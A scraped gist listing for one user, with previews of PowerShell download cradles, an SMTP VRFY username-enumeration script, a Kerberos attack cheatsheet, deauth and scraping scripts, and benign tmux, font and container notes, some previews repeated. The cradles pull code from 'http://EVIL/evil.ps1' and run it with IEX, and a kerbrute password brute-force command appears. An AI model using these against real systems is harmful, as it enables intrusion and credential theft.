Patrick Young kmahyyg

## DownloadCradles.ps1
# normal download cradle
IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")

# PowerShell 3.0+
IEX (iwr 'http://EVIL/evil.ps1')

# hidden IE com object
$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r

# Msxml2.XMLHTTP COM object

## smtpvrfy.py
#!/usr/bin/python3
#
# Simple script intended to abuse SMTP server's VRFY command to leak
# usernames having accounts registered within it.
#
# Mariusz B., 2016
#
# Converted to Python3 by kmahyyg, 20230404
#
# Designed to split per 18 names, since my environment per 20 failed attempts

## kerberos_attacks_cheatsheet.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                kmahyyg
                / kerberos_attacks_cheatsheet.md
            
            
              Created
              July 7, 2020 08:13
                — forked from TarlogicSecurity/kerberos_attacks_cheatsheet.md
            
              
                A cheatsheet with commands that can be used to perform kerberos attacks
              
          
    Kerberos cheatsheet

Bruteforcing

With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With Rubeus version with brute module:

  
## readme.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                kmahyyg
                / readme.md
            
            
              Created
              May 4, 2019 04:11
                — forked from artizirk/systemd-nspawn container architecture.md
            
              
                systemd-nspawn container architecture
              
          
    systemd-nspawn container architecture

This short document will show how to turn systemd-nspawn into a usable containeration system.
Those instructions here should work under Arch Linux and Debian 9
Host requirements


systemd-nspawn and machinectl (systemd-container package under Debian)
dnsmasq
debootstrap


## tmux_cheatsheet.markdown

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                kmahyyg
                / tmux_cheatsheet.markdown
            
            
              Created
              March 17, 2019 14:23
                — forked from henrik/tmux_cheatsheet.markdown
            
              
                tmux cheatsheet
              
          
    tmux cheatsheet

As configured in my dotfiles.
start new:
tmux

start new with session name:

  
## 99-noto-mono-color-emoji.conf
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE fontconfig SYSTEM "fonts.dtd">
<!--
Noto Mono + Color Emoji Font Configuration.

Currently the only Terminal Emulator I'm aware that supports colour fonts is Konsole.

Usage:
0. Ensure that the Noto fonts are installed on your machine.
1. Install this file to ~/.config/fontconfig/conf.d/99-noto-mono-color-emoji.conf

## deauth.py
import argparse
from multiprocessing import Process
import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
from scapy.all import *
import signal
import threading
from sys import platform


## scrape.py
import time
from selenium import webdriver

driver = webdriver.Chrome('./chromedriver')
driver.get('https://ui.lkqd.com/login')
assert 'LKQD' in driver.title

time.sleep(2)
username_field = driver.find_element_by_name('username')
username_field.send_keys('myusername')
	# normal download cradle
	IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")

	# PowerShell 3.0+
	IEX (iwr 'http://EVIL/evil.ps1')

	# hidden IE com object
	$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r

	# Msxml2.XMLHTTP COM object
	#!/usr/bin/python3
	#
	# Simple script intended to abuse SMTP server's VRFY command to leak
	# usernames having accounts registered within it.
	#
	# Mariusz B., 2016
	#
	# Converted to Python3 by kmahyyg, 20230404
	#
	# Designed to split per 18 names, since my environment per 20 failed attempts
	<?xml version="1.0" encoding="UTF-8"?>
	<!DOCTYPE fontconfig SYSTEM "fonts.dtd">
	<!--
	Noto Mono + Color Emoji Font Configuration.

	Currently the only Terminal Emulator I'm aware that supports colour fonts is Konsole.

	Usage:
	0. Ensure that the Noto fonts are installed on your machine.
	1. Install this file to ~/.config/fontconfig/conf.d/99-noto-mono-color-emoji.conf
	import argparse
	from multiprocessing import Process
	import logging
	logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
	from scapy.all import *
	import signal
	import threading
	from sys import platform
	import time
	from selenium import webdriver

	driver = webdriver.Chrome('./chromedriver')
	driver.get('https://ui.lkqd.com/login')
	assert 'LKQD' in driver.title

	time.sleep(2)
	username_field = driver.find_element_by_name('username')
	username_field.send_keys('myusername')